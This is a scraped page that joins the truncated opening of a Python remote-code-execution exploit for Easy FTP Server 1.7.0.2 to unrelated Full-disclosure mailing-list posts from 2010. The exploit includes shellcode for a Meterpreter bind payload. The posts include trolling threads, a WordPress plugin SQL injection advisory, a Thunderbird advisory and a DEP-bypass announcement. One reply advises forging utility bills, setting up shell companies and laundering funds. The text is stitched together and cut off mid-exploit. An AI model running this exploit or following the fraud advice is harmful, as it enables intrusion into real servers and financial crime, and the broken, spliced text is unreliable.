http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
- - Vulnerable Program:
http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip
- - Exploit Download:
https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip

#

#!/usr/bin/env python
# RCE for Easy FTP Server 1.7.0.2 w/ RET overwrite
# app @ http://code.google.com/p/easyftpsvr/
# Copyright 2010 Paul Makowski, GPLv2
# explanation of technique: http://wp.me/pBV1X-3Q
# based on: http://seclists.org/bugtraq/2010/Feb/202
# version 0.1

import socket
from sys import exit
from optparse import OptionParser

parser = OptionParser()
parser.add_option("-t", "--target", dest="target", metavar="TARGET",
type="string", help="target IP address")
parser.add_option("-p", "--port", dest="port", metavar="PORT",
type="string", help="target port")
(options, args) = parser.parse_args()

if not options.target: parser.error("Target unspecified.")
if not options.port: options.port = 21

# -- #

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   connect = s.connect((options.target, int(options.port)))
   print "[+] connected"

except:
   print "[-] connection failed"
   exit(1)

# get to vulnerable code (post auth, defaults allow anon login)
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS anonymous\r\n")
s.recv(1024)


### fixRet ###
# ret is located @ 0x009afe64 & needs to be replaced with part of our payload (or NOPs)
fixRet = (
   "\x31\xc0" +              # xor %eax,%eax
   "\x31\xdb" +              # xor %ebx,%ebx
   "\x31\xc9" +              # xor %ecx,%ecx
   "\xb8\xce\x54\x30\xaa" +  # mov $0xaa3054ce,%eax
   "\xbb\xaa\xaa\xaa\xaa" +  # mov $0xaaaaaaaa,%ebx
   "\x31\xd8" +              # xor %ebx,%eax (now %eax should hold 0x009AFE64)
   #"\xb9\x90\x90\x90\x90" + # mov $0x90909090,%ecx (use this if your payload <= 233 bytes)
   #"\xb9\x1a\x29\xeb\x0e" + # mov $0xeeb291a,%ecx (4 bytes of bind_tcp payload to overwrite RET with)
   "\xb9\x5f\xe4\xe0\xae" +  # mov $0xaee0e45f,%ecx (4 bytes of meterpreter_bind_tcp payload to overwrite RET with)
   "\x89\x08" )              # mov %ecx,(%eax)


### payloads ###

Re: [Full-disclosure] I am furious.

2010-03-01 Thread Jeff Williams
>
>  "I spend my career working against hackers, proposing new laws and
>  lobbying the government to make life difficult for hackers."
>

The only career you've done so far is as a drug addict, and you're doing
that pretty well.

Re: [Full-disclosure] I am furious.

2010-03-01 Thread Christian Sciberras
"why dont you use your big words to explain how is it fair that im
banned here"
Banned? How then would it be that you're still here?

"im a mi5 honeytrap and the government is going to come to me and
ask for my help. i record videos of these guys jerking off and
forward them to mark seiden."
Oh come on, we all know you keep some for yourself...



On Mon, Mar 1, 2010 at 9:53 PM, intel unit  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> why dont you use your big words to explain how is it fair that im
> banned here
>
> i am trying to save lives. i pose as a minor in yahoo chatrooms and
> let old fat blokes message me.
>
> i expose them.
>
> im a mi5 honeytrap and the government is going to come to me and
> ask for my help. i record videos of these guys jerking off and
> forward them to mark seiden.
>
> it's counter intelligent.
>
> what are your accomplishments valdis?
>
> On Mon, 01 Mar 2010 20:37:02 + valdis.kletni...@vt.edu wrote:
> >On Mon, 01 Mar 2010 18:48:22 GMT, intel unit said:
> >
> >> We are security experts nothing to do with hackers and 0-day.
> >
> >> I don't have just 1 0day. I have 26 0days and can hack anything
> >if
> >> the price is right.
> >
> >Cognitive dissonance FTW. ;)

Re: [Full-disclosure] I am furious.

2010-03-01 Thread intel unit
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

why dont you use your big words to explain how is it fair that im
banned here

i am trying to save lives. i pose as a minor in yahoo chatrooms and
let old fat blokes message me.

i expose them.

im a mi5 honeytrap and the government is going to come to me and
ask for my help. i record videos of these guys jerking off and
forward them to mark seiden.

it's counter intelligent.

what are your accomplishments valdis?

On Mon, 01 Mar 2010 20:37:02 + valdis.kletni...@vt.edu wrote:
>On Mon, 01 Mar 2010 18:48:22 GMT, intel unit said:
>
>> We are security experts nothing to do with hackers and 0-day.
>
>> I don't have just 1 0day. I have 26 0days and can hack anything
>if
>> the price is right.
>
>Cognitive dissonance FTW. ;)


Re: [Full-disclosure] I am furious.

2010-03-01 Thread Stuart Carter
intel unit wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> You decided to use and abuse my web log postings for your own self
> satisfaction.
> 


... dude, it'll be a cold day in hell before I use anything from *you* 
for self satisfaction O.O




Re: [Full-disclosure] I am furious.

2010-03-01 Thread the hacker

On Mon, 01 Mar 2010 18:48:22 GMT, intel unit said:



>  We are security experts nothing to do with hackers and 0-day.
   
>  I don't have just 1 0day. I have 26 0days and can hack anything if

>  the price is right.
   


01.03.10 21:37, valdis.kletni...@vt.edu:


Cognitive dissonance FTW.;)


Or more likely schizoid tendencies leading to multiple identity disturbances


Re: [Full-disclosure] I am furious.

2010-03-01 Thread intel unit
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I'm not interested in this kind of behaviour from young people.

You had the opportunity to read an experts view of national
security and intelligence and you blew it.

You decided to use and abuse my web log postings for your own self
satisfaction.

You made cheap remarks about 0-day and Yahoo Messenger and hackers,
none of which I have anything to do with.

I spend my career working against hackers, proposing new laws and
lobbying the government to make life difficult for hackers.

You don't seem to care what damage misrepresentation does to someone.
You lost me my job opportunity at Yahoo and MI5.

Mark Seiden, any chance you will hire me still tho?

On Mon, 01 Mar 2010 18:57:26 + netinfinity
 wrote:
>*I have 26 0days and can hack anything if
>the price is right. And I sell them to the bad guys, for the lulz.
>I think being disloyal and a hypocrite is hilarious.
>
>I am a consummate civil servant, if I do say so myself.
>*
>
>You are a funny troll. I like your posts :)
>
>--
>http://netinfinity-sec.blogspot.com
>
>http://www.ubuntu-pe.tk


Re: [Full-disclosure] I am furious.

2010-03-01 Thread Valdis . Kletnieks
On Mon, 01 Mar 2010 18:48:22 GMT, intel unit said:

> We are security experts nothing to do with hackers and 0-day.

> I don't have just 1 0day. I have 26 0days and can hack anything if
> the price is right.

Cognitive dissonance FTW. ;)



Re: [Full-disclosure] Going "underground", living out of backpack, etc?

2010-03-01 Thread NOC
On 3/1/10 8:30 AM, "valdis.kletni...@vt.edu" 
wrote:
> ...  Giardia out in the woods is a horrid
> way to die a slow death.

Giardia, isn't that the new shopping mall restaurant chain?




Re: [Full-disclosure] I am furious.

2010-03-01 Thread Stuart Carter
I really couldn't give a flying rat's posterior what you think. You are 
an utter twerp who only adds noise to this list.

Go away.



intel unit wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> I am stopping using this web log 

blah blah blah shut up twerp
> 


Re: [Full-disclosure] I am furious.

2010-03-01 Thread Urlan
Hahahahahahahaha!

Urlan

2010/3/1 M.B.Jr. 

> Ai, santa!
>
>
> On Mon, Mar 1, 2010 at 3:48 PM, intel unit  wrote:
> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA1
> >
> > I am stopping using this web log its just being used by people not
> > interested in national security to paste my work to Full-disclosure
> > mailing list to misrepresent me and my group.
> >
> > They tried to say I was a hacker with 0-day, I am furious.
> >
> > We are security experts nothing to do with hackers and 0-day.
> >
> > I spend my life against hackers and 0-day, I suggest new laws
> > against hackers, and lobby the government to introduce new laws to
> > gain more intelligence about them.
> >
> > I am a strong policy maker within corporations against hackers and
> > 0-day.
> >
> > This misrepresentation is damaging and I am angry.
> >
> > I don't have just 1 0day. I have 26 0days and can hack anything if
> > the price is right. And I sell them to the bad guys, for the lulz.
> > I think being disloyal and a hypocrite is hilarious.
> >
> > I am a consummate civil servant, if I do say so myself.
> >
> > This web log is now closed, I got sum inboxin to do.
>
>
>
> --
> Marcio Barbado, Jr.
>



-- 
_
Urlan Salgado de Barros
MSc. Student in Applied Informatics
Member of NR2 Group
Federal University of Paraná - Curitiba - Brazil
URL: 

Re: [Full-disclosure] I am furious.

2010-03-01 Thread M.B.Jr.
Ai, santa!


On Mon, Mar 1, 2010 at 3:48 PM, intel unit  wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> I am stopping using this web log its just being used by people not
> interested in national security to paste my work to Full-disclosure
> mailing list to misrepresent me and my group.
>
> They tried to say I was a hacker with 0-day, I am furious.
>
> We are security experts nothing to do with hackers and 0-day.
>
> I spend my life against hackers and 0-day, I suggest new laws
> against hackers, and lobby the government to introduce new laws to
> gain more intelligence about them.
>
> I am a strong policy maker within corporations against hackers and
> 0-day.
>
> This misrepresentation is damaging and I am angry.
>
> I don't have just 1 0day. I have 26 0days and can hack anything if
> the price is right. And I sell them to the bad guys, for the lulz.
> I think being disloyal and a hypocrite is hilarious.
>
> I am a consummate civil servant, if I do say so myself.
>
> This web log is now closed, I got sum inboxin to do.



-- 
Marcio Barbado, Jr.



Re: [Full-disclosure] I am furious.

2010-03-01 Thread netinfinity
 *I have 26 0days and can hack anything if
the price is right. And I sell them to the bad guys, for the lulz.
I think being disloyal and a hypocrite is hilarious.

I am a consummate civil servant, if I do say so myself.
*

You are a funny troll. I like your posts :)

-- 
http://netinfinity-sec.blogspot.com

http://www.ubuntu-pe.tk

[Full-disclosure] I am furious.

2010-03-01 Thread intel unit
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I am stopping using this web log its just being used by people not
interested in national security to paste my work to Full-disclosure
mailing list to misrepresent me and my group.

They tried to say I was a hacker with 0-day, I am furious.

We are security experts nothing to do with hackers and 0-day.

I spend my life against hackers and 0-day, I suggest new laws
against hackers, and lobby the government to introduce new laws to
gain more intelligence about them.

I am a strong policy maker within corporations against hackers and
0-day.

This misrepresentation is damaging and I am angry.

I don't have just 1 0day. I have 26 0days and can hack anything if
the price is right. And I sell them to the bad guys, for the lulz.
I think being disloyal and a hypocrite is hilarious.

I am a consummate civil servant, if I do say so myself.

This web log is now closed, I got sum inboxin to do.


Re: [Full-disclosure] Going "underground", living out of backpack, etc?

2010-03-01 Thread Valdis . Kletnieks
On Mon, 01 Mar 2010 04:49:57 GMT, Simon Garfinkle said:

> Have any advice for living out of a bag? Any stories? Any lessons?

Hit up one of the survivalist websites or magazines, look for info on
living off the land.  Learn bowhunting - a rifle tends to draw attention
outside the local hunting season.  Read up on how the Appalachian Trail
through-hikers handle being on a trail for 6 months.

Oh - and get a decent water filter.  Giardia out in the woods is a horrid
way to die a slow death. 



[Full-disclosure] [ MDVSA-2010:051 ] mozilla-thunderbird

2010-03-01 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:051
 http://www.mandriva.com/security/
 ___

 Package : mozilla-thunderbird
 Date: March 1, 2010
 Affected: 2008.0, 2009.1, 2010.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in mozilla-thunderbird:
 
 Security researcher Alin Rad Pop of Secunia Research reported that
 the HTML parser incorrectly freed used memory when insufficient space
 was available to process remaining input. Under such circumstances,
 memory occupied by in-use objects was freed and could later be filled
 with attacker-controlled text. These conditions could result in the
 execution of arbitrary code if methods on the freed objects were
 subsequently called (CVE-2009-1571).
 
 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571
 http://www.mozilla.org/security/announce/2010/mfsa2010-03.html
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of

Re: [Full-disclosure] full disclosure is an intelligence blackhole

2010-03-01 Thread Valdis . Kletnieks
On Mon, 01 Mar 2010 08:06:23 GMT, intel unit said:

> Let's just say we haven't been able to release any information to
> the public for over a year now.
> 
> We don't have anywhere we can post information.

You can post to Bugtraq, your own blog, pass it to people you know on F-D that
might pass along any *actual* new info you have, send it to the US CERT (who
are perfectly willing to take reports from outside the borders), etc etc etc.
I know even if I was banned from F-D and every other list I was on, I could
easily scare up 3 or 4 dozen people I could mail privately and at least one
of them would pass the info along to those who need to know.

> Isn't it a security risk to ban one the biggest security &
> intelligence groups in the UK from posting?

Now, is that merely "biggest", or is there anybody with actual security clout?
L0pht was never big, but they had clue and clout.  50,000 wannabes may be
biggest, but not have clout.

> A security & intelligence group with over 6000 security
> professionals in jobs around the world who make up the n3td3v
> group, banned from making announcements relating to national
> security matters.

And if you're an intelligence group with 6,000 professionals, *somebody* should
have a list of likely contacts. In fact, that's something that should make
you think for a moment - if there's 6,000 people, and *one* of them is banned
from this *one* list, who are these *other* 5,999 professionals who are so
incompetent that they can't get the word out for you? Please let us know, so
we can avoid hiring them.  

Seriously guys - 6,000 *professionals* and *not one* of you can find your ass
with both hands, a flashlight, and a map?

It's been a long time since I laughed so hard I almost wet myself. Thanks
for the Monday humor. ;)


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Wordpress plugin 'Analytics360'- authenticated user sql injection

2010-03-01 Thread Jan G.B.
OK, well - before I get 1 replies: the question was a rhetorical one.


2010/3/1 Benji 

> http://crowdfavorite.com/ loads fine here.
>
> On Mon, Mar 1, 2010 at 4:03 PM, Jan G.B. wrote:
>
>> Hi there,
>>
>> I just noticed that authenticated users for the admin area of a wordpress
>> blog may inject code into database queries, when the plugin "Analytics360"
>> is activated.
>>
>> ### BASIC INFORMATION ###
>>
>> Plugin Name: Analytics360
>> Plugin URI:
>> http://www.mailchimp.com/wordpress_analytics_plugin/?pid=wordpress&source=website
>> Author: Crowd Favorite
>> Author URI: http://crowdfavorite.com
>>
>>
>> ### Affected Version ###
>>
>> Analytics360 v.1.2
>> (and earlier Versions, I guess…)
>>
>>
>> ### Risk ###
>>
>> Well, I can't classify this. When you're not insane, you shouldn't have
>> people as admins, who inject code into the database queries.
>> But, when you have such admins, or your WP-Login is collected by phishing
>> or something alike, your db server and data may be at risk.
>> It all depends on your setup and permissions. However, the bug is easy to
>> fix and so it should be fixed.
>>
>> http://codex.wordpress.org/Function_Reference/wpdb_Class#Run_Any_Query_on_the_Database
>>
>>
>> ### DETAILS ###
>>
>> The code contains this evil part in analytics360.php:
>> 
>>   case 'get_wp_posts':
>>   add_filter('posts_where', create_function(
>>   '$where',
>>   'return $where." AND post_date >=
>> \''.$_GET['start_date'].'\' AND post_date < \''.$_GET['end_date'].'\'";'
>>   ));
>> 
>>
>>
>> ### Disclosure Timeline ###
>>
>> You're the first to know.
>> Anyone is able to telnet crowdfavorite.com:80 ? As I'm writing this, the
>> site is unresponsive.
>> So this is what happens when you include a website as contact information:
>> you don't get the message.
>>
>>
>> Regards
>>
>>
>>
>>
>>
>
>

Re: [Full-disclosure] Going "underground", living out of backpack, etc?

2010-03-01 Thread T Biehn
Simon: What you need is a constant source of income. I suggest you
study TAO Spam (more than just inboxing, mind you.)
You will need an anonymous corporation for fund intake. You will want
a business bank account. You will want to transfer the funds that come
into your account into electronic cash. You will want to mix this cash
about. You will want to lose and create these companies often.

Expect to take a 35% (conservative figure) hit on all profit for
exchange services.

Be sure to know your way around high quality printing and photoshop.
Have a large database of Water & Electric bills. Invest in a
lamination machine. Invest in a magstrip writer & logger, invest in a
smartcard season logger/reader/writer. Learn how to solder. Learn how
to do fast-low cost fabrication.

Acquaint yourself with prepaid visa gift cards and e-cash debit cards.
Acquaint yourself with online (re-)mailing services.
Dispose of all digital equipment you already own and buy new kit with
prepaid visa gift cards or cash.  Perform activations at wifi spots,
don't make the mistake of being in the view of security cameras.
Remove their batteries. Relocate and disappear.

Do not contact friends and family. If you operate online do not use a
constant pseudonym.

-Travis

On Mon, Mar 1, 2010 at 2:21 AM, Christian Sciberras  wrote:
> Start by not touching any kind of digital device. You wouldn't know how many
> chinese have put tracking/spy bugs inside them. Or how many modified NSA
> backdoors, for the matter.
> Using a PC probably increases risk by 1000%.
>
>
>
>
> On Mon, Mar 1, 2010 at 5:49 AM, Simon Garfinkle  wrote:
>>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Hello.
>>
>> I am interested in getting some advice from you security
>> professionals (white hat and black hat) about going underground.
>>
>> I am sick of big brother, I love independence, I was to experience
>> the world and have no commitments.
>>
>> I am just sick of being held down in one place. It's too easy for
>> people to harass and stalk you.  You gotta be mobile. Fancy free
>> and foot loose.
>>
>> You gotta be underground.
>>
>> Have any advice for living out of a bag? Any stories? Any lessons?
>>
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Wordpress plugin 'Analytics360'- authenticated user sql injection

2010-03-01 Thread Benji
http://crowdfavorite.com/ loads fine here.

On Mon, Mar 1, 2010 at 4:03 PM, Jan G.B.  wrote:

> Hi there,
>
> I just noticed that authenticated users for the admin area of a wordpress
> blog may inject code into database queries, when the plugin "Analytics360"
> is activated.
>
> ### BASIC INFORMATION ###
>
> Plugin Name: Analytics360
> Plugin URI:
> http://www.mailchimp.com/wordpress_analytics_plugin/?pid=wordpress&source=website
> Author: Crowd Favorite
> Author URI: http://crowdfavorite.com
>
>
> ### Affected Version ###
>
> Analytics360 v.1.2
> (and earlier Versions, I guess…)
>
>
> ### Risk ###
>
> Well, I can't classify this. When you're not insane, you shouldn't have
> people as admins, who inject code into the database queries.
> But, when you have such admins, or your WP-Login is collected by phishing
> or something alike, your db server and data may be at risk.
> It all depends on your setup and permissions. However, the bug is easy to
> fix and so it should be fixed.
>
> http://codex.wordpress.org/Function_Reference/wpdb_Class#Run_Any_Query_on_the_Database
>
>
> ### DETAILS ###
>
> The code contains this evil part in analytics360.php:
> 
>   case 'get_wp_posts':
>   add_filter('posts_where', create_function(
>   '$where',
>   'return $where." AND post_date >=
> \''.$_GET['start_date'].'\' AND post_date < \''.$_GET['end_date'].'\'";'
>   ));
> 
>
>
> ### Disclosure Timeline ###
>
> You're the first to know.
> Anyone is able to telnet crowdfavorite.com:80 ? As I'm writing this, the
> site is unresponsive.
> So this is what happens when you include a website as contact information:
> you don't get the message.
>
>
> Regards
>
>
>
>
>

[Full-disclosure] Wordpress plugin 'Analytics360'- authenticated user sql injection

2010-03-01 Thread Jan G.B.
Hi there,

I just noticed that authenticated users for the admin area of a wordpress
blog may inject code into database queries, when the plugin "Analytics360"
is activated.

### BASIC INFORMATION ###

Plugin Name: Analytics360
Plugin URI:
http://www.mailchimp.com/wordpress_analytics_plugin/?pid=wordpress&source=website
Author: Crowd Favorite
Author URI: http://crowdfavorite.com


### Affected Version ###

Analytics360 v.1.2
(and earlier Versions, I guess…)


### Risk ###

Well, I can't classify this. When you're not insane, you shouldn't have
people as admins, who inject code into the database queries.
But, when you have such admins, or your WP-Login is collected by phishing or
something alike, your db server and data may be at risk.
It all depends on your setup and permissions. However, the bug is easy to
fix and so it should be fixed.

http://codex.wordpress.org/Function_Reference/wpdb_Class#Run_Any_Query_on_the_Database


### DETAILS ###

The code contains this evil part in analytics360.php:

  case 'get_wp_posts':
      add_filter('posts_where', create_function(
          '$where',
          'return $where." AND post_date >= \''.$_GET['start_date'].'\' AND post_date < \''.$_GET['end_date'].'\'";'
      ));



### Disclosure Timeline ###

You're the first to know.
Anyone is able to telnet crowdfavorite.com:80 ? As I'm writing this, the
site is unresponsive.
So this is what happens when you include a website as contact information:
you don't get the message.


Regards
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
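
The injectable filter from the post above next to a hardened form, as an added example that is not part of the original post or the plugin's code. It assumes the two parameters are meant to be YYYY-MM-DD dates; all function names are hypothetical.

```php
<?php
// Added example: not code from Analytics360. Function names are hypothetical,
// and the YYYY-MM-DD date format is an assumption about what the plugin expects.
declare(strict_types=1);

/**
 * Same shape as the posted snippet: request values are concatenated
 * straight into the WHERE fragment, so a quote in either value ends
 * the string literal and the rest is parsed as SQL.
 */
function where_fragment_unsafe(string $where, array $query): string
{
    return $where . " AND post_date >= '" . $query['start_date']
        . "' AND post_date < '" . $query['end_date'] . "'";
}

/**
 * Accept only a real calendar date written as YYYY-MM-DD.
 * Returns the validated string, or null for anything else.
 */
function parse_ymd($value): ?string
{
    if (!is_string($value) || !preg_match('/\A\d{4}-\d{2}-\d{2}\z/', $value)) {
        return null;
    }
    $dt = DateTimeImmutable::createFromFormat('!Y-m-d', $value);
    // The round trip rejects overflow dates such as 2010-02-31,
    // which createFromFormat would silently roll into March.
    if ($dt === false || $dt->format('Y-m-d') !== $value) {
        return null;
    }
    return $value;
}

/**
 * Hardened form: both values must validate and form a non-empty range.
 * On any failure the fragment matches nothing (fail closed) instead of
 * passing the raw input through.
 */
function where_fragment_safe(string $where, array $query): string
{
    $start = parse_ymd($query['start_date'] ?? null);
    $end   = parse_ymd($query['end_date'] ?? null);
    if ($start === null || $end === null || $start >= $end) {
        return $where . ' AND 1=0';
    }
    // Only digits and hyphens can reach this point. Inside WordPress,
    // $wpdb->prepare() with %s placeholders could do the quoting instead.
    return $where . " AND post_date >= '$start' AND post_date < '$end'";
}

/**
 * Hypothetical wiring for the plugin's 'get_wp_posts' case. A closure
 * replaces create_function(), which builds code from a string and no
 * longer exists in PHP 8. Only callable inside WordPress.
 */
function register_posts_date_filter(array $query): void
{
    add_filter('posts_where', function (string $where) use ($query): string {
        return where_fragment_safe($where, $query);
    });
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: a valid range, a value carrying a quote,
    // and a well-formed but impossible date.
    $samples = [
        ['start_date' => '2010-02-01', 'end_date' => '2010-03-01'],
        ['start_date' => "2010-02-01' OR '1'='1", 'end_date' => '2010-03-01'],
        ['start_date' => '2010-02-31', 'end_date' => '2010-03-01'],
    ];
    foreach ($samples as $q) {
        echo 'unsafe: ', where_fragment_unsafe('', $q), PHP_EOL;
        echo 'safe:   ', where_fragment_safe('', $q), PHP_EOL, PHP_EOL;
    }
}
```

Run from the command line, the second sample shows the unsafe fragment gaining an extra OR clause while the safe one collapses to a condition that matches no rows.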

[Full-disclosure] Internet Exploiter 2 - bypassing DEP

2010-03-01 Thread Berend-Jan Wever
Hey all,

I released a version of my Internet Exploiter 2 exploit from 2005 that
bypasses DEP. If you are familiar with my Internet Exploiter series of
exploits and/or are interested in how to use heap-spraying to bypass DEP,
you may like this:
http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/

Cheers,
SkyLined

Berend-Jan Wever 
http://skypher.com/SkyLined

Re: [Full-disclosure] full disclosure is an intelligence blackhole

2010-03-01 Thread Elly_Tran_Ha
Yahoo massager has 0days? No way!

On Mon, Mar 1, 2010 at 8:53 AM, intel unit  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> back off kid
>
> "n3td3v" is trying to save lives here
>
> yahoo messenger has 0days. now if gadi evron and the mossad were to
> get onto that, it wouldn't be a good thing, now would it?
>
> On Mon, 01 Mar 2010 08:53:53 + "McGhee, Eddie"
>  wrote:
> >Come on mate seriously its getting boring, if any serious security
> >threats are out there then drop the info and man up, stop with the
> >bullshit of making netdev a poor internet meme, because that's all
> >it is..
> >
> >-Original Message-
> >From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
> >disclosure-boun...@lists.grok.org.uk] On Behalf Of intel unit
> >Sent: 01 March 2010 08:06
> >To: full-disclosure@lists.grok.org.uk
> >Subject: [Full-disclosure] full disclosure is an intelligence
> >blackhole
> >
> >-BEGIN PGP SIGNED MESSAGE-
> >Hash: SHA1
> >
> >John Cartwright is perpetrating global conflict by censoring
> >n3td3v's 0days and commenting.
> >Opinion by Andrew Wallace. Published by a believer in free speech
> >who knows Andrew Wallace is an super spy expert. Luyk a jelly
> >samwich amirite?
> >
> >
> >Is banning people from a mailing list a national security risk?
> >
> >We haven't been on the mailing list since January 2009, although
> >there have been plenty of hackers trying to impersonate us.
> >
> >For sure the impersonations are misleading, and we would like to
> >ask, is banning people from a mailing list a vulnerability?
> >
> >Let's just say we haven't been able to release any information to
> >the public for over a year now.
> >
> >We don't have anywhere we can post information.
> >
> >Isn't it a security risk to ban one the biggest security &
> >intelligence groups in the UK from posting?
> >
> >We think so, and why would you want to create a climate where
> >there are plenty n3td3v wanna be's posting to the mailing list,
> >but no actual intelligence on what we're upto, what we've been
> >researching or anything like that.
> >
> >A security & intelligence group with over 6000 security
> >professionals in jobs around the world who make up the n3td3v
> >group, banned from making announcements relating to national
> >security matters.
> >
> >A whole year of no information getting out to the security
> >industry about the vulnerabilities in national security and other
> >research that we've been getting upto.
> >
> >None of that has been post, its all been supressed.
> >
> >By who? One man decided to risk security by banning one of the
> >largest security groups in the United Kingdom.
> >
> >We were treated badly on the mailing list, it wasn't us in the
> >wrong, we only defended ourselves and the integrity of our group
> >from people who were obviously wanting an argument.
> >
> >We aren't playing around, we are grown adults who are serious
> >about security & intelligence.
> >
> >We were made out to be something that we weren't, its not nice to
> >be treated like that.
> >
> >It's why the mailing list can't be taken seriously and poses a
> >risk to national security.
> >
> >Because the people who do research security aren't able to post on
> >the mailing list.
> >
> >And I don't know why more people haven't spoken out about an
> >organisation as big as n3td3v being banned from the mailing list,
> >its a risk to national security.
> >
> >We don't post our intelligence anywhere else apart from the
> >mailing list we've been banned from, and we don't give out any
> >signals intelligence about what we are getting upto, we're very
> >careful about that.
> >
> >The only opportunity to find out what the n3td3v security and
> >intelligence group were upto was being subscribed to the mailing
> >list and reading our emails.
> >
> >Andrew is banned, and banned with that are the voices of over 6000
> >and more researchers, security consultants and many others.
> >
> >Is banning n3td3v from Full-disclosure mailing list a national
> >security issue? Of course it is.
> >
> >National security has been at risk for over a year and will remain
> >at risk... because the information flow has been cut off.
> >
> >Who will be to blame? One man who runs the mailing list, one man
> >will need to live with himself, his name is John Cartwright.
> >
> >He has cut off a major security research and intelligence group on
> >purpose, I don't think he cares about national security.
> >
> >Can he live with himself?
> >
> >We've been sitting in our offices wondering this for over a year,
> >we've held security conferences with our members and other stuff
> >and remain frustrated that we've been cut off from communicating
> >with the security industry.
> >
> >Yours faithfully,
> >
> >n3td3v security
> >& intelligence group

Re: [Full-disclosure] full disclosure is an intelligence blackhole

2010-03-01 Thread intel unit
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

back off kid

"n3td3v" is trying to save lives here

yahoo messenger has 0days. now if gadi evron and the mossad were to
get onto that, it wouldn't be a good thing, now would it?

On Mon, 01 Mar 2010 08:53:53 + "McGhee, Eddie"
 wrote:
>Come on mate seriously its getting boring, if any serious security
>threats are out there then drop the info and man up, stop with the
>bullshit of making netdev a poor internet meme, because that's all
>it is..
>
>-Original Message-
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>disclosure-boun...@lists.grok.org.uk] On Behalf Of intel unit
>Sent: 01 March 2010 08:06
>To: full-disclosure@lists.grok.org.uk
>Subject: [Full-disclosure] full disclosure is an intelligence
>blackhole
>
>-BEGIN PGP SIGNED MESSAGE-
>Hash: SHA1
>
>John Cartwright is perpetrating global conflict by censoring
>n3td3v's 0days and commenting.
>Opinion by Andrew Wallace. Published by a believer in free speech
>who knows Andrew Wallace is an super spy expert. Luyk a jelly
>samwich amirite?
>
>
>Is banning people from a mailing list a national security risk?
>
>We haven't been on the mailing list since January 2009, although
>there have been plenty of hackers trying to impersonate us.
>
>For sure the impersonations are misleading, and we would like to
>ask, is banning people from a mailing list a vulnerability?
>
>Let's just say we haven't been able to release any information to
>the public for over a year now.
>
>We don't have anywhere we can post information.
>
>Isn't it a security risk to ban one the biggest security &
>intelligence groups in the UK from posting?
>
>We think so, and why would you want to create a climate where
>there are plenty n3td3v wanna be's posting to the mailing list,
>but no actual intelligence on what we're upto, what we've been
>researching or anything like that.
>
>A security & intelligence group with over 6000 security
>professionals in jobs around the world who make up the n3td3v
>group, banned from making announcements relating to national
>security matters.
>
>A whole year of no information getting out to the security
>industry about the vulnerabilities in national security and other
>research that we've been getting upto.
>
>None of that has been post, its all been supressed.
>
>By who? One man decided to risk security by banning one of the
>largest security groups in the United Kingdom.
>
>We were treated badly on the mailing list, it wasn't us in the
>wrong, we only defended ourselves and the integrity of our group
>from people who were obviously wanting an argument.
>
>We aren't playing around, we are grown adults who are serious
>about security & intelligence.
>
>We were made out to be something that we weren't, its not nice to
>be treated like that.
>
>It's why the mailing list can't be taken seriously and poses a
>risk to national security.
>
>Because the people who do research security aren't able to post on
>the mailing list.
>
>And I don't know why more people haven't spoken out about an
>organisation as big as n3td3v being banned from the mailing list,
>its a risk to national security.
>
>We don't post our intelligence anywhere else apart from the
>mailing list we've been banned from, and we don't give out any
>signals intelligence about what we are getting upto, we're very
>careful about that.
>
>The only opportunity to find out what the n3td3v security and
>intelligence group were upto was being subscribed to the mailing
>list and reading our emails.
>
>Andrew is banned, and banned with that are the voices of over 6000
>and more researchers, security consultants and many others.
>
>Is banning n3td3v from Full-disclosure mailing list a national
>security issue? Of course it is.
>
>National security has been at risk for over a year and will remain
>at risk... because the information flow has been cut off.
>
>Who will be to blame? One man who runs the mailing list, one man
>will need to live with himself, his name is John Cartwright.
>
>He has cut off a major security research and intelligence group on
>purpose, I don't think he cares about national security.
>
>Can he live with himself?
>
>We've been sitting in our offices wondering this for over a year,
>we've held security conferences with our members and other stuff
>and remain frustrated that we've been cut off from communicating
>with the security industry.
>
>Yours faithfully,
>
>n3td3v security
>& intelligence group

[Full-disclosure] United States Department of Defense Embraces Hacker Certification to Protect US Interests

2010-03-01 Thread yersinia
Perhaps this news could be of interest to someone on this list.

